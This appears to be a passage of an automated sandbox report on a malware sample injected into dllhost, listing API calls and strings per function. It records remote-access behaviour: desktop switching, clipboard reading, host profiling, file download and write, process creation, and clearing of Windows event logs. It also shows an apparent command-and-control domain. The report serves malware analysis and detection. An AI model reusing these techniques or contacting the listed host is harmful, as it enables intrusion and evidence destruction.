                    • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                    • API String ID: 2238633743-588083535
                    • Opcode ID: e81d3781ec5ffca0faf96728c696970540074091559c4d5bb05e5bf769d7fc27
                    • Instruction ID: bb914379c92d9e772e591b9849519aafba6fbad9a3e760065d33464b569322b6
                    • Opcode Fuzzy Hash: e81d3781ec5ffca0faf96728c696970540074091559c4d5bb05e5bf769d7fc27
                    • Instruction Fuzzy Hash: 50314971A1062CAFDB24DF69CC85BEEBBB8EB48710F00419AE519E3241DB745E80CF90
                    APIs
                    • _strrchr.LIBCMT ref: 032A57C5
                    • _memset.LIBCMT ref: 032A57E2
                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 032A57F6
                    • _memset.LIBCMT ref: 032A581C
                    • wsprintfA.USER32 ref: 032A5835
                    • GetFileAttributesA.KERNEL32(00000000), ref: 032A5865
                    • _memset.LIBCMT ref: 032A587B
                    • Sleep.KERNEL32(000003E8), ref: 032A589C
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 032A58C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$AttributesCreateFilePathProcessSleepTemp_strrchrwsprintf
                    • String ID: %s%s$D$WinSta0\Default
                    • API String ID: 1046919704-212261555
                    • Opcode ID: de63e96c08e67dc96ea405817ca1523e0eca135bb4dca684fac09ab8b6020eb2
                    • Instruction ID: 5c83d0976f80efdce1cb8d1a4867f009516d69de8be736286c26e941c3b0d160
                    • Opcode Fuzzy Hash: de63e96c08e67dc96ea405817ca1523e0eca135bb4dca684fac09ab8b6020eb2
                    • Instruction Fuzzy Hash: CC412E7691031CABEF10EB68EC49FEE737C9F55700F144595E608AA181DBB19AC8CB61
                    APIs
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
                      • Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
                      • Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
                      • Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB
                    • _memset.LIBCMT ref: 032A65B6
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 032A65CC
                    • _strrchr.LIBCMT ref: 032A65DB
                    • _strtok.LIBCMT ref: 032A65E9
                    • wsprintfA.USER32 ref: 032A6615
                    • CreateThread.KERNEL32(00000000,00000000,032A5EF0,00000000,00000000,00000000), ref: 032A667F
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032A6686
                    • _strtok.LIBCMT ref: 032A669A
                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000), ref: 032A66B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$Name_strtokwsprintf$CloseComputerCreateFileHandleModuleSleepThread_strrchrlstrcpy
                    • String ID: %s\%s$ARPD
                    • API String ID: 2842694341-582042800
                    • Opcode ID: ffb34fa719b824364a58e71c32519b93274568369c32d7fb01e4fc37f92d25e2
                    • Instruction ID: 4c08186940a8386b850b31032e133055819ce72323ea5f793a7faae0bdf86cc1
                    • Opcode Fuzzy Hash: ffb34fa719b824364a58e71c32519b93274568369c32d7fb01e4fc37f92d25e2
                    • Instruction Fuzzy Hash: 14312D76910709ABEB10E7289C45FDB77789F04B01F0945D5EA48AF281EBF4A6C4CFA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memmove$Xinvalid_argumentstd::_
                    • String ID: invalid string position$string too long
                    • API String ID: 1771113911-4289949731
                    • Opcode ID: 9b348c557170c680ca2b7a0744662c134b6076a933f458c0914190c5a1ce2012
                    • Instruction ID: 195b674467951da8b82438147d539ff866772a31bb6ee8857eb0760f111b074e
                    • Opcode Fuzzy Hash: 9b348c557170c680ca2b7a0744662c134b6076a933f458c0914190c5a1ce2012
                    • Instruction Fuzzy Hash: 0B513975F25607BFEF14EA6DEE4597E366AEBC0610724866BD002CB784E638A8D0C744
                    APIs
                    • _memset.LIBCMT ref: 032A5C52
                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 032A5C79
                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 032A5CB6
                    • CloseHandle.KERNEL32(00000000), ref: 032A5CC1
                    • wsprintfA.USER32 ref: 032A5CFD
                    • lstrcpyA.KERNEL32(00000000,?), ref: 032A5D16
                    • CreateThread.KERNEL32(00000000,00000000,Function_00015B70,00000000,00000000,00000000), ref: 032A5D57
                    • CloseHandle.KERNEL32(00000000), ref: 032A5D5E
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle$ThreadWrite_memsetlstrcpywsprintf
                    • String ID: %s %s
                    • API String ID: 3904585434-2939940506
                    • Opcode ID: 7a5064831df232b53144c24160cd0eb26b6ff6852bb9f032919bb1be32b588bc
                    • Instruction ID: 7a8182316ee1f8c0c0decfd8543cbdb7e51791dc0b69ad19a7838107234f06c1
                    • Opcode Fuzzy Hash: 7a5064831df232b53144c24160cd0eb26b6ff6852bb9f032919bb1be32b588bc
                    • Instruction Fuzzy Hash: 4441D472920B19EBDB31DB289C49FEB7778AB45700F1841D5F509AB180DBB16BC9CB90
                    APIs
                    • _memset.LIBCMT ref: 032A6D5E
                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 032A6D6C
                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 032A6DA2
                    • CloseHandle.KERNEL32(?), ref: 032A6DB8
                    • Sleep.KERNEL32(00000001), ref: 032A6DC0
                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 032A6DCC
                    • FreeLibrary.KERNEL32(00000000), ref: 032A6DE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressProc$CloseFileFreeHandleLibrarySleepWrite_memset
                    • String ID: InternetCloseHandle$InternetReadFile
                    • API String ID: 586530251-535091292
                    • Opcode ID: 5f0bf03886b24237963196178a66c21624c2cbbc252e00d066883935dae2c322
                    • Instruction ID: 336ef69ff9f68e4b4764d411fad0a67666013e4f7d37418d734fc209e9890bfb
                    • Opcode Fuzzy Hash: 5f0bf03886b24237963196178a66c21624c2cbbc252e00d066883935dae2c322
                    • Instruction Fuzzy Hash: BB1151F6910618ABDB20EB649C85FEEB37CAB84700F008589E309A6145CB745AC6CFA4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$ComputerNamelstrcpylstrlenwsprintf
                    • String ID: SOFTWARE\%s\$Time$UnKnow
                    • API String ID: 3529005902-722125974
                    • Opcode ID: 37bfb3b1ad6a4193f50ab8f174bb788567ebbd05f8c607c13ed749cc6cb6a296
                    • Instruction ID: af37a13f2c7a59e2670c8c8da6cae53f8d5ad951af4a3f3246d94da40bbafcfb
                    • Opcode Fuzzy Hash: 37bfb3b1ad6a4193f50ab8f174bb788567ebbd05f8c607c13ed749cc6cb6a296
                    • Instruction Fuzzy Hash: 0011A3B5950318AFDB20EB69EC49F9E777CAF44700F0044D9E609E6181EBB59B94CB60
                    APIs
                    • LoadLibraryA.KERNEL32(user32.dll,1D2AA39B), ref: 032A3445
                    • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 032A345C
                    • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 032A3466
                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 032A346E
                      • Part of subcall function 032A31C0: LoadLibraryA.KERNEL32(user32.dll,1D2AA39B), ref: 032A320A
                      • Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 032A3220
                      • Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 032A322E
                      • Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 032A323C
                      • Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 032A324A
                      • Part of subcall function 032A31C0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A3257
                      • Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 032A3267
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                    • API String ID: 2238633743-3711086354
                    • Opcode ID: 0dd26173507dca3bd2e47b5c7a309b19c5a5c514d3b24ea408a4318e9d37835e
                    • Instruction ID: 4b51360ae0dfd88d4d05074d9787a18b1e0e36b4dd19592d62e2208239173fbb
                    • Opcode Fuzzy Hash: 0dd26173507dca3bd2e47b5c7a309b19c5a5c514d3b24ea408a4318e9d37835e
                    • Instruction Fuzzy Hash: F9110176A40B18AFDB00EFA9DC45BAFFBF8FF44B10F10412AE915E3241D7B458408AA4
                    APIs
                    • _memset.LIBCMT ref: 032A3D4C
                    • _memset.LIBCMT ref: 032A3D5D
                      • Part of subcall function 032A4A70: _memset.LIBCMT ref: 032A4AD6
                      • Part of subcall function 032A4A70: _memset.LIBCMT ref: 032A4AE9
                      • Part of subcall function 032A4A70: _memset.LIBCMT ref: 032A4AFC
                      • Part of subcall function 032A4A70: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B09
                      • Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 032A4B23
                      • Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 032A4B31
                      • Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 032A4B3F
                      • Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 032A4B47
                      • Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 032A4B4F
                      • Part of subcall function 032A4A70: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B7C
                      • Part of subcall function 032A4A70: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4D13
                    • lstrlenA.KERNEL32(00000000), ref: 032A3D84
                    • lstrcpyA.KERNEL32(Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz,UnKnow), ref: 032A3D9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressProc_memset$Library$FreeLoadOpenlstrcpylstrlen
                    • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz$ProcessorNameString$UnKnow
                    • API String ID: 91903147-2537824486
                    • Opcode ID: e487e0f9170d8ffbbf2698171662741362ab60f70f8a71cce6249ad2b9c99a33
                    • Instruction ID: c8e04e1abbf5e364939f9bc51e618af1b974944f87a2525ba263d7532f81ab3b
                    • Opcode Fuzzy Hash: e487e0f9170d8ffbbf2698171662741362ab60f70f8a71cce6249ad2b9c99a33
                    • Instruction Fuzzy Hash: AD01D634760B0CABDA10EBEC9C06F9D73749F48B40F608414B606BE1C5DBF069D8C695
                    APIs
                    • _memset.LIBCMT ref: 032A6710
                    • lstrcpyA.KERNEL32(?,?), ref: 032A672F
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 032A675D
                    • CreateThread.KERNEL32(00000000,00000000,Function_000134E0,Function_00014360,00000000,00000000), ref: 032A677D
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 032A678E
                    • CloseHandle.KERNEL32(?), ref: 032A679B
                    • Sleep.KERNEL32(?), ref: 032A67A8
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 032A67BB
                    • CloseHandle.KERNEL32(00000000), ref: 032A67C2
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CloseCreateHandleObjectSingleWait$EventSleepThread_memsetlstrcpy
                    • String ID:
                    • API String ID: 1863454284-0
                    • Opcode ID: 2899de2378f73e163ff06d40457b09babc16bb3cfbd655f8773d80dba22e14ad
                    • Instruction ID: b6441a95c39b2abc81b987d28ac7e5f7a8560250e1ce667d6062c29be19aae41
                    • Opcode Fuzzy Hash: 2899de2378f73e163ff06d40457b09babc16bb3cfbd655f8773d80dba22e14ad
                    • Instruction Fuzzy Hash: A9319A72A1031CABDB14DB65EC49BDA7778AB48710F008599E719EB1C0CB7155C4CFA0
                    APIs
                      • Part of subcall function 032928EE: _malloc.LIBCMT ref: 03292908
                    • _memset.LIBCMT ref: 032A6358
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 032A6449
                    • CreateThread.KERNEL32(00000000,00000000,Function_000134E0,Function_00015EF0,00000000,00000000), ref: 032A6469
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 032A647A
                    • CloseHandle.KERNEL32(?), ref: 032A6487
                    • CreateThread.KERNEL32(00000000,00000000,Function_00015EF0,00000000,00000000,00000000), ref: 032A6535
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Create$Thread$CloseEventHandleObjectSingleWait_malloc_memset
                    • String ID: yxxx
                    • API String ID: 3710809023-3567846162
                    • Opcode ID: 62edda56b64c8420a77d2b46830bbde2c1504f8b44ba2b742d397d7566904589
                    • Instruction ID: 45fa2bb9113bc075a3f7ccfa41f489671e553ea71ebf84d37a94584548e635ba
                    • Opcode Fuzzy Hash: 62edda56b64c8420a77d2b46830bbde2c1504f8b44ba2b742d397d7566904589
                    • Instruction Fuzzy Hash: C9612C75A102189BDB24DF18DC81BD9B7B5EB48310F1840E6EA49AF381CBB16ED5CF90
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,?), ref: 032A5070
                    • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 032A507F
                    • LoadLibraryA.KERNEL32(?), ref: 032A50BE
                      • Part of subcall function 0329348D: _malloc.LIBCMT ref: 0329349B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 032A512C
                    • FreeLibrary.KERNEL32(?), ref: 032A5173
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Library$AddressLoadProc$Free_malloc
                    • String ID: IsBadReadPtr$kernel32.dll
                    • API String ID: 1447571555-2271619998
                    • Opcode ID: f72ecedbff80f30e6eee584cda4269ceb2ab93fbf021cd4ccd932e4e72d7d03b
                    • Instruction ID: 35e97fc0d71d253a4ef0062a525911c5f973717dcb70b662134619e73269ae97
                    • Opcode Fuzzy Hash: f72ecedbff80f30e6eee584cda4269ceb2ab93fbf021cd4ccd932e4e72d7d03b
                    • Instruction Fuzzy Hash: B4415B71A10A0AEFDB10CF69D884A6BF7B8FF45B44F298069DC95E7241D770E980CB90
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A36CC
                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 032A36E7
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 032A36F1
                    • FreeLibrary.KERNEL32(00000000), ref: 032A3705
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressLibraryProc$FreeLoad
                    • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                    • API String ID: 2256533930-2522683910
                    • Opcode ID: 64dd24093e186923ae987e7e5b4609fb388825fe794b166d16d07b94fa9d3219
                    • Instruction ID: 55db9ed0b1065efc71b545b994be47febbcec65d90cff6eafef1b46db55361be
                    • Opcode Fuzzy Hash: 64dd24093e186923ae987e7e5b4609fb388825fe794b166d16d07b94fa9d3219
                    • Instruction Fuzzy Hash: A5F0A775511B1CBFC710E7ADAC49DAFB76CDF86691B110145FD04D32049F759D4095B0
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,762323A0,?,032A46B5), ref: 032A70D2
                    • CloseHandle.KERNEL32(?), ref: 032A70DF
                    • CloseHandle.KERNEL32(?,762323A0,?,032A46B5), ref: 032A70E8
                    • DeleteCriticalSection.KERNEL32(?), ref: 032A70F1
                    • WSACleanup.WS2_32 ref: 032A70F7
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 032A7119
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 032A7131
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 032A7149
                      • Part of subcall function 032A6EF0: setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 032A6F12
                      • Part of subcall function 032A6EF0: CancelIo.KERNEL32(000000FF,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F1F
                      • Part of subcall function 032A6EF0: InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A6F2E
                      • Part of subcall function 032A6EF0: closesocket.WS2_32(000000FF), ref: 032A6F3B
                      • Part of subcall function 032A6EF0: SetEvent.KERNEL32(?,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F48
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: FreeVirtual$CloseHandle$CancelCleanupCriticalDeleteEventExchangeInterlockedObjectSectionSingleWaitclosesocketsetsockopt
                    • String ID:
                    • API String ID: 1236122821-0
                    • Opcode ID: a5b98b6a23cbd39ffa3d9af637114dc1867b15263322b963902655cc5bcd1f27
                    • Instruction ID: be08c78261373b0a036094c2e7ed368de6022d3bc18eefdad6251e406383f345
                    • Opcode Fuzzy Hash: a5b98b6a23cbd39ffa3d9af637114dc1867b15263322b963902655cc5bcd1f27
                    • Instruction Fuzzy Hash: 47119170210F019BC630EB7E9C48B56B7E86F44B10F198A0DE5A1E72D0CB70F484CBA4
                    APIs
                    • OpenClipboard.USER32(00000000), ref: 032A5D9A
                    • GetClipboardData.USER32(00000001), ref: 032A5DAA
                    • GlobalLock.KERNEL32(00000000), ref: 032A5DB4
                    • GlobalUnlock.KERNEL32(?), ref: 032A5E83
                    • CloseClipboard.USER32 ref: 032A5E89
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                    • String ID: NULL
                    • API String ID: 1006321803-324932091
                    • Opcode ID: 1a068b2843dc4136fe1e584159dc8b258b588dc72f65eba58bd08bca6df4dab5
                    • Instruction ID: 14a8c621b2d6be77dba4c35495455fbf42796c280968b3e5fa7fa026b6810ab0
                    • Opcode Fuzzy Hash: 1a068b2843dc4136fe1e584159dc8b258b588dc72f65eba58bd08bca6df4dab5
                    • Instruction Fuzzy Hash: 5731F479500B45ABC711DB2CA858AD77BF99F86300B1DC1A4E889CB305EA70D648C7D0
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,032AC518,00000008,032944B3,00000000,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C), ref: 032943BC
                    • __lock.LIBCMT ref: 032943F0
                      • Part of subcall function 0329A278: __mtinitlocknum.LIBCMT ref: 0329A28E
                      • Part of subcall function 0329A278: __amsg_exit.LIBCMT ref: 0329A29A
                      • Part of subcall function 0329A278: EnterCriticalSection.KERNEL32(00000000,00000000,?,03294583,0000000D,032AC540,00000008,0329467A,00000000,?,03293AE9,00000000,032AC4B8,00000008,03293B4E,?), ref: 0329A2A2
                    • InterlockedIncrement.KERNEL32(?), ref: 032943FD
                    • __lock.LIBCMT ref: 03294411
                    • ___addlocaleref.LIBCMT ref: 0329442F
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: KERNEL32.DLL
                    • API String ID: 637971194-2576044830
                    • Opcode ID: b7432206f47e01338466e0a45397006abf327f7675877d097ef73dd31298c74f
                    • Instruction ID: af85ba7b818c178be000cd91e6c16393eaf62d32d28d80faa90ec375f4783721
                    • Opcode Fuzzy Hash: b7432206f47e01338466e0a45397006abf327f7675877d097ef73dd31298c74f
                    • Instruction Fuzzy Hash: 46018475551B04DFFB20EF6AD809749FBE0BF50320F20894ED4969B690CBB0A6C5CB15
                    APIs
                    • OpenEventLogA.ADVAPI32(00000000,032AB7DC), ref: 032A55ED
                    • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 032A55F8
                    • CloseEventLog.ADVAPI32(00000000), ref: 032A55FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Event$ClearCloseOpen
                    • String ID: Application$Security$System
                    • API String ID: 1391105993-2169399579
                    • Opcode ID: 94c757ad1ed8ae553d0bd5c2e9924141a9cd42428f2f6841942b5808bffd41af
                    • Instruction ID: 3dd3dc529a06eaab4805ba6eb55f97986cbf63f41ed0215ef1341c44b739bc2a
                    • Opcode Fuzzy Hash: 94c757ad1ed8ae553d0bd5c2e9924141a9cd42428f2f6841942b5808bffd41af
                    • Instruction Fuzzy Hash: 42F0A037A01A1867C211EA9FAC8CB8FFBBCAF45741F008051EA08D7200D6704985CBA9
                    APIs
                    • __getptd.LIBCMT ref: 032A23DE
                      • Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
                      • Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8
                    • __getptd.LIBCMT ref: 032A23EF
                    • __getptd.LIBCMT ref: 032A23FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$RCC$csm
                    • API String ID: 803148776-2671469338
                    • Opcode ID: 5ff6f26a87c0c3e5c503b97343bda7331f47ee5ac7169556d7096976f886bea8
                    • Instruction ID: f62ea7a99af3f532898245adc44c8d3d2494c4afe5f1ecc3ce26b26e29a25d48
                    • Opcode Fuzzy Hash: 5ff6f26a87c0c3e5c503b97343bda7331f47ee5ac7169556d7096976f886bea8
                    • Instruction Fuzzy Hash: CDE01234134705CFDB10EB6DD18977832D4AF85314F5A18A3D41CCB222C7A8E4E14963
                    APIs
                      • Part of subcall function 032928EE: _malloc.LIBCMT ref: 03292908
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
                      • Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
                      • Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
                      • Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB
                    • wsprintfA.USER32 ref: 032A3CC4
                    • lstrcpyA.KERNEL32(00000004,---+++***bbb,?,?,?), ref: 032A3CEF
                    • lstrcpyA.KERNEL32(00000004,api.mods4ws.me,?,?,?), ref: 032A3D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memsetlstrcpy$wsprintf$ComputerName_malloc
                    • String ID: ---+++***bbb$CopyC$api.mods4ws.me
                    • API String ID: 98932487-2030633342
                    • Opcode ID: 49e44ebf67c1f91464bd7dd7475c4a98bfbaab63399e78b3c7e443ddf8db168d
                    • Instruction ID: 08b6d2899dceb96230f2c85206bbc06504f39eae640efbdc2fc5cf490349b488
                    • Opcode Fuzzy Hash: 49e44ebf67c1f91464bd7dd7475c4a98bfbaab63399e78b3c7e443ddf8db168d
                    • Instruction Fuzzy Hash: 99213B79710B05ABC700DF5DFC48B99B7A9FB48315F0441A9DA09C7200DB759598C7A0
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 032A2697
